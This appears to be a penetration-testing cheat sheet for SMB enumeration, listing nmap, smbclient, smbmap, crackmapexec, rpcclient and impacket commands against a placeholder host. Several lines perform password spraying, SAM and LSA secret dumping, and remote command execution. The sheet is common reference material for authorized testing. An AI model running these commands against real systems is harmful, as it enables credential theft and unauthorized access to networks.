SMB Enumeration
SMB Protocol Versions
- SMBv1 (vulnerable, deprecated)
- SMBv2
- SMBv3
Quick Process
- Confirm SMB is open (445/139) and identify SMB version.
- Attempt null session / guest access to list shares and users.
- Enumerate shares and permissions; map read/write access.
- Collect user and group info; identify targets for password spraying.
- If creds exist, enumerate deeper (SAM, LSA, sessions, local admin).
Nmap SMB Scripts
# SMB enumeration
nmap --script smb-enum-shares,smb-enum-users -p 445 target.com
# SMB vulnerabilities
nmap --script smb-vuln* -p 445 target.com
# SMB OS discovery
nmap --script smb-os-discovery -p 445 target.com
# SMB protocols
nmap --script smb-protocols -p 445 target.com
# SMB security modes (signing, guest)
nmap --script smb-security-mode -p 445 target.com
# Enumerate shares with creds
nmap --script smb-enum-shares --script-args smbusername=username,smbpassword=password -p 445 target.com
Enum4linux
# Full enumeration
enum4linux -a target.com
# User enumeration
enum4linux -U target.com
# Share enumeration
enum4linux -S target.com
# Password policy
enum4linux -P target.com
# Group enumeration
enum4linux -G target.com
# With credentials
enum4linux -a -u username -p password target.com
SMBClient
# List shares
smbclient -L //target.com
# Connect to share
smbclient //target.com/share
# With credentials
smbclient //target.com/share -U username
# Anonymous access
smbclient //target.com/share -N
# Execute command
smbclient //target.com/share -c 'ls'
# Download file
smbclient //target.com/share -c 'get file.txt'
# Upload file
smbclient //target.com/share -c 'put local.txt'
# Recurse list (large shares)
smbclient //target.com/share -c 'recurse; ls'
SMBMap
# List shares
smbmap -H target.com
# With credentials
smbmap -H target.com -u username -p password
# Execute command
smbmap -H target.com -u username -p password -x 'whoami'
# Download file
smbmap -H target.com -u username -p password --download 'share\file.txt'
# Upload file
smbmap -H target.com -u username -p password --upload 'local.txt' 'share\remote.txt'
# Enumerate drive permissions
smbmap -H target.com -u username -p password -R
# Filter for writable shares
smbmap -H target.com -u username -p password --check-writable
CrackMapExec
# SMB enumeration
crackmapexec smb target.com
# With credentials
crackmapexec smb target.com -u username -p password
# Share enumeration
crackmapexec smb target.com -u username -p password --shares
# Password spraying
crackmapexec smb target.com -u users.txt -p password
# Dump SAM
crackmapexec smb target.com -u username -p password --sam
# Enumerate local admins
crackmapexec smb target.com -u username -p password --local-admins
# Enumerate sessions
crackmapexec smb target.com -u username -p password --sessions
# Password spraying with user list and file of passwords
crackmapexec smb target.com -u users.txt -p passwords.txt --spray
RPC Client
# Connect
rpcclient -U "" target.com
# Enumerate users
rpcclient -U "" target.com -c "enumdomusers"
# Enumerate groups
rpcclient -U "" target.com -c "enumdomgroups"
# Get user info
rpcclient -U "" target.com -c "queryuser 0x1f4"
# Enumerate domain password policy
rpcclient -U "" target.com -c "getdompwinfo"
# List domain aliases
rpcclient -U "" target.com -c "enumalsgroups domain"
# Resolve SID to name
rpcclient -U "" target.com -c "lookupsids S-1-5-21-..."
# List shares
impacket-smbclient username:password@target.com
# Get user info
impacket-lookupsid username:password@target.com
# Enumerate logged-on users
impacket-wmiexec username:password@target.com "query user"
# Secretsdump
impacket-secretsdump username:password@target.com
# Dump LSA secrets (requires admin)
impacket-secretsdump username:password@target.com -lsa
Common Examples
# Null session share enumeration
smbclient -L //target.com -N
# Null session user enumeration
rpcclient -U "" -N target.com -c "enumdomusers"
# Authenticated share listing with domain user
smbclient -L //target.com -U 'DOMAIN\username'
# Identify SMB signing and dialects
nmap --script smb-protocols,smb-security-mode -p 445 target.com
# Check for anonymous access to IPC$
smbclient //target.com/IPC$ -N
Useful Links